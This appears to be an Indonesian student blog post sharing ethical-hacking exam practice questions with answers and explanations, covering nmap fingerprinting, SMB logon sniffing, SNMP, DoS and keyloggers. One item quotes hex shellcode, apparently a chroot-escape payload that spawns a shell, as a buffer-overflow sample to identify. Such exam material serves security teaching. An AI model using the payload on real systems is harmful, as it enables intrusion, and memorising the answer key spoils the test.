Soal Foresec Computer Hacking

Sedang menghadapi Ujian Akhir Semester? dikejar deadline project, bimbingan, tugas, dan segala macam momok dunia perkuliahan dan tiba-tiba dosen mengumumkan bahwa untuk UAS soal yang keluar adalah soal foresec berbahasa inggris, kali ini saya akan berbagi pengalaman sewaktu menempuh perkuliahan computer hacking.

berikut merupakan kisi kisi soal Foresec yang dibagikan pada saat pertemuan terakhir perkuliahan kata dosen" belajar ya, siapa tau nanti keluar"

1.What would you do next to fingerprint the OS?

While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan:

Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:

(The 1592 ports scanned but not shown below are in state: filtered) PortStateService
21/tcpopenftp
25/tcpopensmtp
53/tcpcloseddomain
80/tcpopenhttp
443/tcpopenhttp

Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed — 1 IP address (1 host up) scanned in 277.483 seconds

What would you do next to fingerprint the OS?

A.Perform a tcp traceroute to the system using port 53

B.Run an nmap scan with the -vv option

C.Perform a Firewalk with that system as the target IP

D.Connect to the active services and review the banner information

Explanation:
Most people don’t care about changing the banners presented by applications listening to open ports and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.

2.What do you think is the most likely reason behind this?

A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchange which carries user logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture any logons though he knows that other users are logging on. What do you think is the most likely reason behind this?

A.L0phtcrack only sniffs logons to web servers

B.Kerberos is preventing it

C.There is a NIDS present on that segment

D.Windows logons cannot be sniffed

Explanation:
In a Windows 2000 network using Kerberos you normally use pre-authentication and the user password never leaves the local machine so it is never exposed to the network so it should not be able to be sniffed.

3.How does a denial-of-service attack work?

How does a denial-of-service attack work?

A.A hacker uses every character, word, or letter he or she can think of to defeat authentication

B.A hacker prevents a legitimate user (or group of users) from accessing a service

C.A hacker tries to decipher a password by using a system, which subsequently crashes the network

D.A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Explanation:
In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).

3.What can he infer from this file?

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect’s workstation. He comes across a file that is just called “file.txt” but when he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x)
((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24) char infin_loop[]= /* for testing purposes */
“\xEB\xFE”;
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
“\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43″
“\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0″
“\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0″
“\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80″
“\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9″
“\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75″
“\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd”
“\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46″
“\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56″
“\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53″
“\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30″
“\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e”
“\x67\x6c\x69\x6e”;
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;

What can he infer from this file?
A.A picture that has been renamed with a .txt extension
B.An encrypted file
C.A uuencoded file

D.A buffer overflow

Explanation:
This is a buffer overflow exploit with its “payload” in hexadecimal format.

4.Which of the following features makes this possible?

SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. Hackers have used this protocol for a long time to gather great amount of information about remote hosts. Which of the following features makes this possible?

A.It uses TCP as the underlying protocol

B.It uses a community string sent as clear text

C.It is susceptible to sniffing

D.It is used by ALL devices on the market

Explanation:
SNMP uses UDP, not TCP, and even though many devices uses SNMP not ALL devices use it and it can be disabled on most of the devices that does use it. However SNMP is susceptible to sniffing and the community string (which can be said acts as a password) is sent in clear text.

 

5.Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

A.Stealth keylogger

B.Hardware keylogger

C.Software keylogger

D.Covert keylogger

Explanation:
As the hardware keylogger never interacts with the Operating System it is undetectable by anti- virus or anti-spyware products.